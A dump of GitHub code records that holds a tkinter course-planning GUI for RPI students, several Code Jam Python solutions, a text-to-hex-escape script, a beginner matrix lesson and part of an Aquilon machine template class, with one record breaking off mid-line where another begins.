finalResult))\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/671.py","file_name":"671.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15887951217","text":"# -*- encoding:utf-8 -*-\n# Dependencies\nfrom tkinter import *\n\nfrom PIL import Image, ImageTk\n\nfrom basicClasses.InfoGatherer import InfoGatherer\n\nTEAM_SLOGAN_STR = \"RPI YOUR OWN ADVENTURE\"\ncourse_list = []\n\n\nclass UserTypeEnum(enum.Enum):\n \"\"\"\n The Class for representing the user Types\n \"\"\"\n STUDENT = \"STUDENT\"\n GUEST = \"GUEST\"\n\n\nclass pageEnum(enum.Enum):\n \"\"\"\n The class for representing the current page\n \"\"\"\n loginWindow = \"loginWindow\"\n mainWindow = \"mainWindow\"\n AddSkillPage = \"AddSkillPage\"\n requestWindow = \"requestWindow\"\n extraWindow = \"extraWindow\"\n\n\nclass loginWindow:\n \"\"\"\n This is the page for user login / Guest mode selection\n \"\"\"\n\n def __init__(self, master):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n \"\"\"\n self.master = master\n # Data segment\n self.user_type = None\n self.gatherer = None\n self.RIN = None\n self.password = None\n self.next = None\n self.page_name = pageEnum.loginWindow\n \"\"\"\n define logo title and window dimension\n \"\"\"\n self.img = PhotoImage(file='src/rpi.gif')\n self.label_img = Label(self.master, image=self.img)\n self.label_img.pack()\n self.screen_width = self.master.maxsize()[0]\n self.screen_height = self.master.maxsize()[1]\n self.w = int((self.screen_width - 600) / 2)\n self.h = int((self.screen_height - 400) / 2)\n self.master.geometry(f'600x400+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n self.master.title(TEAM_SLOGAN_STR)\n\n self.RIN_label = Label(self.master, width=7, text='RIN', compound='center')\n self.RIN_label.place(x=200, y=120)\n self.password_label = Label(self.master, width=7, text='Password: ', compound='center')\n self.password_label.place(x=200, y=120 + 40)\n\n RIN = StringVar\n password = StringVar\n\n self.RIN_entry = Entry(self.master, textvariable=RIN, bg='yellow')\n self.RIN_entry.pack()\n self.RIN_entry.place(x=280, y=80 + 40)\n\n self.Password_entry = Entry(self.master, textvariable=password, show='*', bg='yellow')\n self.Password_entry.pack()\n self.Password_entry.place(x=280, y=120 + 40)\n\n self.loginButton = Button(self.master, text=\"Login in as RPI student\", width=20, compound='center',\n command=lambda: self.check_password(),\n fg='black', bg='yellow')\n self.loginButton.pack()\n self.loginButton.place(x=150, y=150 + 40)\n self.guestButton = Button(self.master, text=\"Guest Mode\", width=15, compound='center',\n command=lambda: self.guest_mode(), fg='black', bg='yellow')\n self.guestButton.pack()\n self.guestButton.place(x=350, y=150 + 40)\n\n def check_password(self):\n \"\"\"\n This function checks the set username and password and set the logged_in status accordingly\n \"\"\"\n self.master.title(\"Logging in, please wait\")\n self.RIN = self.RIN_entry.get()\n self.password = self.Password_entry.get()\n if self.RIN is None or self.password is None or len(self.RIN) == 0 or len(self.password) == 0:\n self.master.title(\"Please enter the username/password to continue\")\n return\n self.gatherer = InfoGatherer(rin=self.RIN_entry.get(), password=self.Password_entry.get())\n if self.gatherer.logged_in:\n self.user_type = 
UserTypeEnum.STUDENT\n self.goNext()\n else:\n self.master.title(\"Failed to log in, please retry.\")\n\n def goNext(self):\n \"\"\"\n Initialize and assign the next page to te current variable\n \"\"\"\n self.master.quit()\n # self.master = Tk()\n self.label_img.destroy()\n self.next = mainWindow(self.master)\n self.master.mainloop()\n\n def guest_mode(self):\n \"\"\"\n Start as guest (no skillTreeNode, an empty Tree is initialized)\n \"\"\"\n self.user_type = UserTypeEnum.GUEST\n self.goNext()\n\n\nclass mainWindow:\n \"\"\"\n This is the main page that shows the skill tree, the requests and the available options\n \"\"\"\n\n def __init__(self, master):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n \"\"\"\n # Data segment\n self.page_name = pageEnum.mainWindow\n self.sub_page_name = None\n self.sub_page_window = None\n self.PersonObj = None\n self.user_type = None\n self.ST = None\n self.gatherer = None\n self.show_skill_flag = False\n self.accept_list = None\n\n # Skill Tree Diagram\n resize_img = Image.open(\"src/skillTreeDiagramPlaceHolder.png\").resize((800, 570))\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 800) / 2)\n self.master.geometry(f'1200x800+{self.w}+{self.h}')\n self.master.resizable(width=True, height=True)\n self.master.title(TEAM_SLOGAN_STR)\n\n self.skillFrame = LabelFrame(self.master, text=\"Skill Tree Diagram: \", padx=10, pady=12, font=(\"Georgia\", 20))\n self.skillFrame.pack()\n self.skillImg = ImageTk.PhotoImage(resize_img)\n self.label1 = Label(self.skillFrame, image=self.skillImg)\n self.label1.pack()\n self.skillFrame.place(x=0, y=0)\n\n # Request List\n self.requestFrame = LabelFrame(self.master, text=\"Request List: \", font=(\"Georgia\", 20))\n self.requestFrame.pack()\n self.request_data = StringVar()\n self.requestList = Listbox(self.requestFrame, width=40, height=37, listvariable=self.request_data)\n self.requestList.pack()\n self.requestFrame.place(x=840, y=0)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n\n # Add/remove button\n self.add_or_remove = Button(\n self.master,\n text=\"Add/Remove From SIS\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.addOrRemove()\n )\n self.add_or_remove.config(image=self.buttonImg)\n self.add_or_remove.pack()\n self.add_or_remove.place(x=75, y=650)\n\n # show skill tree button\n self.show = Button(\n self.master,\n text=\"Show Skill Tree\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.show_skill()\n )\n self.show.config(image=self.buttonImg)\n self.show.pack()\n self.show.place(x=325, y=650)\n\n # Add extracurricular button\n self.Add_Extra = Button(\n self.master,\n text=\"Add extracurricular\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.extra()\n )\n self.Add_Extra.config(image=self.buttonImg)\n self.Add_Extra.pack()\n self.Add_Extra.place(x=575, y=650)\n\n # Modify requests button\n self.modify_request = Button(\n self.master,\n text=\"Modify requests\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.ModifyQuest()\n )\n self.modify_request.config(image=self.buttonImg)\n self.modify_request.pack()\n self.modify_request.place(x=825, y=650)\n\n def Update_skilltree(self):\n \"\"\"\n 
Reload the skillTree image from stored path\n \"\"\"\n resize_img = Image.open('pic_save/temp_fig.png').resize((620, 348))\n self.skillImg = ImageTk.PhotoImage(resize_img)\n self.label1 = Label(self.master, image=self.skillImg)\n self.label1.pack()\n self.label1.place(x=70, y=50)\n\n def extra(self):\n self.go_extra_page()\n\n def go_extra_page(self):\n \"\"\"\n Initialize and go into extracurricular page\n \"\"\"\n self.sub_page_name = pageEnum.extraWindow\n self.master.deiconify()\n new_window = Toplevel(self.master)\n self.sub_page_window = new_window\n extrapage(new_window, personObj=self.PersonObj, st=self.ST, parent=self)\n new_window.mainloop()\n\n def addOrRemove(self):\n \"\"\"\n Switch to the add/remove page\n \"\"\"\n self.goto_add_remove_page()\n\n def show_skill(self):\n \"\"\"\n Show the skillTree in a separate window\n \"\"\"\n self.show_skill_flag = True\n\n def goto_add_remove_page(self):\n \"\"\"\n Initialize and show the add/remove page\n \"\"\"\n self.sub_page_name = pageEnum.AddSkillPage\n self.master.deiconify()\n new_window = Toplevel(self.master)\n AddSkillPage(new_window, personObj=self.PersonObj, st=self.ST, parent=self)\n self.sub_page_window = new_window\n new_window.mainloop()\n\n def ModifyQuest(self):\n \"\"\"\n Goto the request modification page\n \"\"\"\n self.goto_modify_request_page()\n\n def goto_modify_request_page(self):\n \"\"\"\n Initialize the request page and then show it\n \"\"\"\n self.master.deiconify()\n newwindow = Toplevel(self.master)\n request = requestWindow(newwindow, personObj=self.PersonObj)\n self.master.wait_window(newwindow)\n self.accept_list = request.return_list()\n self.request_data.set(self.accept_list)\n\n\nclass extrapage:\n def __init__(self, master, personObj=None, st=None, parent=None):\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 800) / 2)\n self.h = int((self.screen_height - 600) / 2)\n self.master.geometry(f'800x600+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n # Course List\n\n # ###################################################################################\n self.PersonObj = personObj\n self.ST = st\n self.parent = parent\n # Listbox representation for displaying the added/available courses\n self.courseList_listbox = None\n self.addedList_listbox = None\n # Data representation for the course/added list as dict\n self.course_dict = None\n # Temp list for addition\n self.course_list = None\n self.added_list = None\n\n self.course_dict = dict()\n self.course_list = []\n self.added_list = []\n\n if self.PersonObj is not None:\n # Update the selectable courses\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.course_list.append(str(item))\n self.course_dict[str(item)] = item\n # Update the selected courses\n for course in self.PersonObj.get_skills():\n self.added_list.append(str(course))\n else:\n self.course_list = ['mock list', 'Operating System', 'Principle of Software', 'Intro to algorithm']\n for item in self.course_list:\n self.course_dict[item] = item\n\n # self.courseframe=LabelFrame(self.master, text=\"Course List: \", font=(\"Georgia\", 20))\n # self.courseframe.pack(side=TOP)\n self.course_data = StringVar()\n self.courseList = Listbox(self.master, height=30, width=50, listvariable=self.course_data,\n selectmode='multiple')\n\n # print(self.added_list)\n\n for course in self.added_list:\n self.courseList.insert(END, course)\n\n self.courseList.pack()\n self.courseList.place(x=10, 
y=10)\n # Extra course\n self.extra_course = StringVar()\n self.extra_entry = Entry(self.master, textvariable=self.extra_course)\n self.extra_entry.insert(0, \"Enter Course here\")\n self.extra_entry.pack()\n self.extra_entry.place(x=500, y=150, width=150, height=50)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n # Add button\n self.addExtra = Button(\n self.master,\n text=\"Add\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: self.add()\n )\n self.addExtra.config(image=self.buttonImg)\n self.addExtra.pack()\n self.addExtra.place(x=500, y=200, width=150, height=50)\n\n def add(self):\n # print(self.extra_entry.get())\n this_input = str(self.extra_entry.get())\n selected_course_index = []\n if this_input == \"Enter Course here\" or this_input == \"\":\n return\n try:\n selected_course_index = self.courseList.curselection()\n # print(selected_course_index)\n except:\n return\n selected_course = [self.ST.get_node_by_shortName(self.courseList.get(index)) for index in selected_course_index]\n this_skill = self.ST.add_custom_skill(skill_name=this_input, parent=selected_course)\n self.PersonObj.add_skill(self.ST, this_skill)\n\n self.go_back()\n\n def go_back(self):\n self.parent.sub_page_name = None\n self.parent.sub_page_window = None\n self.master.destroy()\n\n\nclass AddSkillPage:\n \"\"\"\n This is the page that allows you modify your skill tree via SIS\n \"\"\"\n\n def __init__(self, master, personObj=None, st=None, parent=None):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n :param personObj: the Person class instance used to store user info\n :param st: the SkillTree instance for fetching the courses\n :param parent: the parent page of the current page\n \"\"\"\n self.course = Label(master, width=20, text='CourseList', compound='center', font=(\"Georgia\", 25))\n self.course.place(x=0, y=0)\n self.added = Label(master, width=20, text='Added courses', compound='center', font=(\"Georgia\", 25))\n self.added.place(x=350, y=0)\n # Data segment\n self.page_name = pageEnum.AddSkillPage\n self.PersonObj = personObj\n self.ST = st\n self.parent = parent\n # Listbox representation for displaying the added/available courses\n self.courseList_listbox = None\n self.addedList_listbox = None\n # Data representation for the course/added list as dict\n self.course_dict = None\n # Temp list for addition\n self.course_list = None\n self.added_list = None\n\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 800) / 2)\n self.master.geometry(f'1200x800+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n\n # Set up the status bar\n self.statusBar = StringVar()\n self.statusBar.set(\"Ready\")\n self.console = Label(self.master, textvariable=self.statusBar, height=3, relief=SUNKEN, anchor=\"w\")\n self.console.pack(side=BOTTOM, fill=X)\n\n # Set up the course list\n self.courseList_listbox = Listbox(self.master, width=35, height=35)\n # Available course list:\n self.course_dict = dict()\n self.course_list = []\n self.added_list = []\n\n if self.PersonObj is not None:\n # Update the selectable courses\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.course_list.append(str(item))\n self.course_dict[str(item)] = item\n # Update the selected courses\n for course in 
self.PersonObj.get_skills():\n                self.added_list.append(str(course))\n                self.course_dict[str(course)] = course\n        else:\n            self.course_list = ['mock list', 'Operating System', 'Principle of Software', 'Intro to algorithm']\n            for item in self.course_list:\n                self.course_dict[item] = item\n\n        self.course_list.sort()\n        self.added_list.sort()\n\n        # Show the selectable course in a list\n        for item in self.course_list:\n            if item not in self.added_list and item.lower() != \"root\":\n                self.courseList_listbox.insert(END, item)\n        self.courseList_listbox.pack()\n        self.courseList_listbox.place(x=100, y=50)\n\n        # Show the added course in a list\n        self.addedList_listbox = Listbox(self.master, width=35, height=35)\n        for course in self.added_list:\n            self.addedList_listbox.insert(END, course)\n        self.addedList_listbox.pack()\n        self.addedList_listbox.place(x=450, y=50)\n\n        # this is a button sample background\n        self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n        self.buttonImg = self.buttonImg.subsample(2, 2)\n\n        # # entry for potential added course\n        # self.potentialCourseName = StringVar\n        # self.entryPotentialCourse = Entry(self.master, textvariable=self.potentialCourseName)\n        # self.entryPotentialCourse.insert(0, \"Enter course name\")\n        # self.entryPotentialCourse.pack()\n        # self.entryPotentialCourse.place(x=750, y=50, width=150, height=50)\n\n        # Add button\n        self.add = Button(\n            self.master,\n            text=\"Add\",\n            compound='center',\n            font=\"arial 10\",\n            fg=\"black\",\n            bd=0,\n            command=lambda: self.just_add()\n        )\n        self.add.config(image=self.buttonImg)\n        self.add.pack()\n        self.add.place(x=740, y=110)\n\n        # remove button\n        self.remove = Button(\n            self.master,\n            text=\"Remove\",\n            compound='center',\n            font=\"arial 10\",\n            fg=\"black\",\n            bd=0,\n            command=lambda: self.just_remove()\n        )\n        self.remove.config(image=self.buttonImg)\n        self.remove.pack()\n        self.remove.place(x=740, y=180)\n\n        # entry for CRN input\n        self.CRN_num = StringVar()\n        self.entryCRN = Entry(self.master, textvariable=self.CRN_num)\n        self.entryCRN.insert(0, \"Enter CRN here\")\n        self.entryCRN.pack()\n        self.entryCRN.place(x=750, y=280, width=150, height=50)\n\n        # another add course button\n        self.addByCRN = Button(\n            self.master,\n            text=\"Add by CRN\",\n            compound='center',\n            font=\"arial 10\",\n            fg=\"black\",\n            bd=0,\n            command=lambda: self.add_CRN()\n        )\n        self.addByCRN.config(image=self.buttonImg)\n        self.addByCRN.pack()\n        self.addByCRN.place(x=740, y=330)\n\n        # entry for filter\n        self.filter_text = StringVar()\n        self.Filter = Entry(self.master, textvariable=self.filter_text)\n        self.Filter.insert(0, \"Enter Text here\")\n        self.Filter.pack()\n        self.Filter.place(x=750, y=430, width=150, height=50)\n\n        # apply button\n        self.Apply = Button(\n            self.master,\n            text=\"Apply Filter\",\n            compound='center',\n            font=\"arial 10\",\n            fg=\"black\",\n            bd=0,\n            command=lambda: self.filter()\n        )\n        self.Apply.config(image=self.buttonImg)\n        self.Apply.pack()\n        self.Apply.place(x=740, y=480)\n\n        # go back button\n        self.back = Button(\n            self.master,\n            text=\"Go Back\",\n            compound='center',\n            font=\"arial 10\",\n            fg=\"black\",\n            bd=0,\n            command=lambda: self.goBack()\n        )\n        self.back.config(image=self.buttonImg)\n        self.back.pack()\n        self.back.place(x=740, y=550)\n\n    def just_add(self):\n        \"\"\"\n        Add the selected course from the list to the user skillTree, if nothing is selected, return\n        \"\"\"\n        self.statusBar.set(\"Adding course........\")\n        self.console.update()\n        try:\n            if self.courseList_listbox.curselection()[0] is not None and 
self.courseList_listbox.curselection()[0] >= 0:\n # Get selection and add the skill\n selected = self.courseList_listbox.get(self.courseList_listbox.curselection())\n self.PersonObj.add_skill(self.ST, self.course_dict[selected])\n self.courseList_listbox.delete(self.courseList_listbox.curselection())\n self.course_list.remove(str(self.course_dict[selected]))\n # Update the added skill\n self.addedList_listbox.insert(END, str(self.course_dict[selected]))\n self.added_list.append(str(self.course_dict[selected]))\n self.statusBar.set(\"Added {}\".format(selected))\n self.console.update()\n\n # Try to add to SIS if logged in\n if self.parent.user_type == UserTypeEnum.STUDENT:\n self.parent.gatherer.add_course_from_SIS()\n except IndexError:\n self.statusBar.set(\"No course selected.\")\n self.console.update()\n\n def just_remove(self):\n \"\"\"\n Remove the selected course from the added list, if nothing is selected, return\n \"\"\"\n self.statusBar.set(\"Removing course........\")\n self.console.update()\n try:\n # print(self.addedList_listbox.curselection()[0])\n if self.addedList_listbox.curselection()[0] is not None and self.addedList_listbox.curselection()[0] >= 0:\n # Get selection and remove the skill\n selected = self.addedList_listbox.get(self.addedList_listbox.curselection())\n self.PersonObj.remove_skill(self.ST, self.course_dict[selected])\n self.addedList_listbox.delete(self.addedList_listbox.curselection())\n self.added_list.remove(str(self.course_dict[selected]))\n # Update the available skills\n self.courseList_listbox.insert(END, str(self.course_dict[selected]))\n self.course_list.append(str(self.course_dict[selected]))\n self.statusBar.set(\"Removed {}\".format(selected))\n self.console.update()\n\n # Try to remove from SIS if logged in\n if self.parent.user_type == UserTypeEnum.STUDENT:\n self.parent.gatherer.remove_course_from_SIS()\n except IndexError:\n self.statusBar.set(\"No course selected.\")\n self.console.update()\n\n def add_CRN(self):\n \"\"\"\n Add the course by the CRN input, hint when necessary\n \"\"\"\n self.statusBar.set(\"Busy!!! 
Adding course........\")\n self.console.update()\n this_input = self.entryCRN.get()\n # print(this_input)\n # Try to find the course in the ST:\n this_course = self.ST.get_node_by_ID(this_input)\n if this_course is None:\n self.statusBar.set(\"No such course found.\")\n self.console.update()\n return\n if this_course not in self.PersonObj.get_selectable_courses(self.ST):\n self.statusBar.set(\"Course cannot be selected, prerequisite not satisfied\")\n self.console.update()\n return\n self.filter(force_str=str(this_course))\n self.courseList_listbox.selection_set(0)\n self.just_add()\n self.filter(force_str=\"$RELOAD$\")\n self.statusBar.set(\"Course is added!!!!!\")\n self.console.update()\n\n def filter(self, force_str=None):\n \"\"\"\n Filter the selectable course by the given string, null string or default text will not be recognized\n :param force_str: the str used to adjust the status\n \"\"\"\n if force_str is not None:\n filter_text = force_str\n else:\n filter_text = self.Filter.get()\n if filter_text == \"\" or filter_text == \"Enter Text here\":\n return\n self.courseList_listbox.delete(0, self.courseList_listbox.size())\n if filter_text == \"$RELOAD$\":\n for item in self.PersonObj.get_selectable_courses(self.ST):\n self.courseList_listbox.insert(END, item)\n for item in self.PersonObj.get_selectable_courses_filtered(self.ST, filter_text):\n if str(item) not in self.added_list:\n self.courseList_listbox.insert(END, item)\n\n def goBack(self):\n \"\"\"\n Go back to the parent page\n \"\"\"\n self.parent.sub_page_name = None\n self.parent.sub_page_window = None\n self.master.destroy()\n\n\nclass requestWindow:\n \"\"\"\n The window for modifying the request\n \"\"\"\n\n def __init__(self, master, personObj=None, st=None):\n \"\"\"\n :param master: the tkinter instance used to initialize the page\n :param personObj: the Person class instance used to store user info\n :param st: the SkillTree instance for fetching the courses\n \"\"\"\n # Data segment\n self.page_name = pageEnum.requestWindow\n self.PersonObj = personObj\n self.ST = st\n self.requestinfo = None\n\n self.master = master\n self.screen_width, self.screen_height = self.master.maxsize()\n self.w = int((self.screen_width - 1200) / 2)\n self.h = int((self.screen_height - 760) / 2)\n self.master.geometry(f'1200x760+{self.w}+{self.h}')\n self.master.resizable(width=False, height=False)\n\n # Available Request List\n self.avalFrame = LabelFrame(self.master, text=\"Available Request List: \", font=(\"Georgia\", 20))\n self.avalFrame.pack(side=TOP)\n self.avail_item = StringVar()\n self.avail_item.set(self.PersonObj.get_avail_request())\n self.avail_request = Listbox(self.avalFrame, width=67, height=35, listvariable=self.avail_item)\n self.avail_request.pack()\n self.avalFrame.place(x=50, y=0)\n\n # Accepted Request List\n self.acceptFrame = LabelFrame(self.master, text=\"Accepted Request List: \", font=(\"Georgia\", 20))\n self.acceptFrame.pack(side=TOP)\n self.accept_item = StringVar()\n self.accept_item.set(self.PersonObj.get_accept_request())\n self.accept_request = Listbox(self.acceptFrame, width=70, height=35, listvariable=self.accept_item)\n self.accept_request.pack()\n self.acceptFrame.place(x=610, y=0)\n\n # this is a button sample background\n self.buttonImg = PhotoImage(file=\"src/buttonSample.png\")\n self.buttonImg = self.buttonImg.subsample(2, 2)\n\n # Accept button\n self.accept = Button(\n self.master,\n text=\"Accept>>\",\n compound='center',\n font=\"arial 10\",\n fg=\"black\",\n bd=0,\n command=lambda: 
self.accept_move()\n )\n self.accept.config(image=self.buttonImg)\n self.accept.pack()\n self.accept.place(x=170, y=600)\n\n # remove button\n self.remove = Button(\n self.master,\n text=\"< chosen:\r\n return c\r\n return avail[0]\r\n\r\ndef war(naomi, ken):\r\n npoints = 0\r\n for n in reversed(naomi):\r\n k = next_higher(n, ken)\r\n if n > k:\r\n npoints += 1\r\n ken.remove(k)\r\n return npoints\r\n\r\ndef deceitwar(naomi, ken):\r\n pnaomi = 0\r\n while len(naomi) > 0:\r\n if naomi[0] > ken[0]:\r\n pnaomi += 1\r\n naomi.pop(0)\r\n ken.pop(0)\r\n else:\r\n naomi.pop(0)\r\n ken.pop()\r\n return pnaomi\r\n\r\nlines = [l.rstrip() for l in sys.stdin.readlines()]\r\nfor x in xrange(int(lines.pop(0))):\r\n naomi = sorted([float(i) for i in lines[x*3+1].split(' ')])\r\n ken = sorted([float(i) for i in lines[x*3+2].split(' ')])\r\n print(\"Case #%u: %u %u\" % (x + 1, deceitwar(naomi[:], ken[:]), war(naomi[:], ken[:])))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1720.py","file_name":"1720.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23380026361","text":"def checkXStraightx():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[i][j] != \"X\" and a[i][j] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkOStraightx():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[i][j] != \"O\" and a[i][j] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkXStraighty():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[j][i] != \"X\" and a[j][i] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkOStraighty():\r\n for i in xrange(4):\r\n sucess = True\r\n for j in xrange(4):\r\n if(a[j][i] != \"O\" and a[j][i] != \"T\" ):\r\n sucess = False\r\n if(sucess):\r\n return True\r\n return False\r\n\r\ndef checkXDiag1():\r\n for i in xrange(4):\r\n if(a[i][i] != \"X\" and a[i][i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkODiag1():\r\n for i in xrange(4):\r\n if(a[i][i] != \"O\" and a[i][i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkXDiag2():\r\n for i in xrange(4):\r\n if(a[i][3-i] != \"X\" and a[i][3-i] != \"T\" ):\r\n return False\r\n return True\r\n\r\ndef checkODiag2():\r\n for i in xrange(4):\r\n if(a[i][3-i] != \"O\" and a[i][3-i] != \"T\" ):\r\n return False\r\n return True\r\ndef checkunfilled():\r\n for i in xrange(4):\r\n for j in xrange(4):\r\n if(a[i][j] == \".\"):\r\n return True\r\n\r\nT = int(raw_input())\r\na = []\r\nfor testcase in xrange(T):\r\n a = []\r\n for rows in range(4):\r\n row = raw_input()\r\n a.append([row[0],row[1],row[2],row[3]])\r\n if(checkXStraightx() or checkXStraighty() or checkXDiag1()or checkXDiag2()):\r\n print(\"Case #\"+str(testcase+1)+\": X won\")\r\n elif(checkOStraightx() or checkOStraighty() or checkODiag1() or checkODiag2()):\r\n print(\"Case #\"+str(testcase+1)+\": O won\")\r\n elif(checkunfilled()):\r\n print(\"Case #\"+str(testcase+1)+\": Game has not completed\")\r\n else:\r\n print(\"Case #\"+str(testcase+1)+\": Draw\")\r\n raw_input()\r\n 
\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1699.py","file_name":"1699.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4998712860","text":"#!/usr/bin/python\nimport sys\n\nascii_chars = ' abcdefghijklmnopqrstuvwxyz'\ncount = 97\nascii_table = []\nfor letter in ascii_chars:\n    values = {'char':letter,'dec':'','hex':''}\n    if(letter == ' '):\n        values['char'] = 'SPACE'\n        values['dec'] = 32\n    else: \n        values['dec'] = count\n        count+=1\n    values['hex'] = hex(values['dec'])[2:]\n    ascii_table.append(values) \n\ndef stringToHex(msg):\n    hexmessage = ''\n    for letter in msg:\n        if(letter == ' '):\n            letter = 'SPACE'\n        ascii_position = 0\n        while (ascii_position < len(ascii_table)):\n            if(ascii_table[ascii_position]['char'] == letter):\n                hexmessage += '\\\\x%s' %ascii_table[ascii_position]['hex']\n            ascii_position += 1\n    return hexmessage\nif (len(sys.argv) == 2):\n    print(stringToHex(\"%s\" %sys.argv[1].lower()))\nelse:\n    print('Parametros incorretos!')\n    print('Modo de usar: ./ascii.py \"mensagem\"')\n#print(stringToHex(input(\"Digite a mensagem que voce quer... \")))\n","repo_name":"SorcererBR/asciitable","sub_path":"ascii.py","file_name":"ascii.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42104589128","text":"# Two-dimensional array\n'''\ndef show_matrix(matrix):\n    for row in matrix: # the loop runs once per row, so we get each row in turn\n        for x in row: # print the row\n            print(x, end=\" \")\n        print()\n\nm = [[1, 2, 3], [2, 3, 4], [3, 4, 5]]\n\n\nshow_matrix(m)\n\n# print(m)\n# print(m[0])\n# print(m[0][1])\n'''\n\nimport random\n\ndef init_matrix(matrix, min_n, max_n):\n    for i in range(len(matrix)):\n        for j in range(len(matrix[0])):\n            matrix[i][j] = random.randint(min_n, max_n)\n\n\ndef show_matrix(matrix):\n    for row in matrix:\n        for x in row:\n            print(x, end=\" \")\n        print()\n\nn = 10\na = [[0]* n for i in range(n)]\n\ninit_matrix(a, 1, 101)\n\nshow_matrix(a)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Oleg0079912/progr.1299.student","sub_path":"lessons_hillel/Lesson_3 (Двмерный массив).py","file_name":"Lesson_3 (Двмерный массив).py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32273056006","text":"import logging\n\nfrom aquilon.aqdb.model import Machine\nfrom aquilon.worker.locks import CompileKey\nfrom aquilon.worker.templates.base import Plenary\nfrom aquilon.worker.templates.panutils import (StructureTemplate, pan_assign,\n                                               pan_include, PanMetric,\n                                               PanEscape)\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass PlenaryMachineInfo(Plenary):\n\n    template_type = \"structure\"\n\n    def __init__(self, dbmachine, logger=LOGGER):\n        Plenary.__init__(self, dbmachine, logger=logger)\n        self.machine = dbmachine.label\n\n        loc = dbmachine.location\n        self.hub = loc.hub.fullname.lower()\n        self.building = loc.building.name\n        self.city = loc.city.name\n        self.continent = loc.continent.name\n\n        if loc.rack:\n            self.rack = loc.rack.name\n            self.rackrow = loc.rack.rack_row\n            self.rackcol = loc.rack.rack_column\n        else:\n            self.rack = None\n\n        if loc.room:\n            self.room = loc.room.name\n        else:\n            self.room = None\n\n        if loc.bunker:\n            self.bunker = loc.bunker.name\n        else:\n            self.bunker = None\n\n        if loc.campus:\n            self.campus = loc.campus.name\n        else:\n            self.campus = None\n\n        self.dns_search_domains = []\n        parents = loc.parents[:]\n        parents.append(loc)\n        parents.reverse()\n        for parent in parents:\n            # Filter out duplicates\n            extra_domains = [map.dns_domain.name\n                             for map in parent.dns_maps\n                             if map.dns_domain.name not in self.dns_search_domains]\n            self.dns_search_domains.extend(extra_domains)\n\n        self.sysloc = loc.sysloc()\n\n        # If this changes, machine_plenary_will_move() needs to be updated to match.\n        self.plenary_core = \"machine/%(hub)s/%(building)s/%(rack)s\" % self.__dict__\n        self.plenary_template = self.machine\n\n    def get_key(self):\n        host = self.dbobj.host\n        container = self.dbobj.vm_container\n        # Need a compile key if:\n        # - There is a host attached.\n        # - This is a virtual machine in a container.\n        if not host and not container:\n            return None\n        # We have at least host or container, maybe both...\n        if host:\n            # PlenaryHost is actually a PlenaryCollection... 
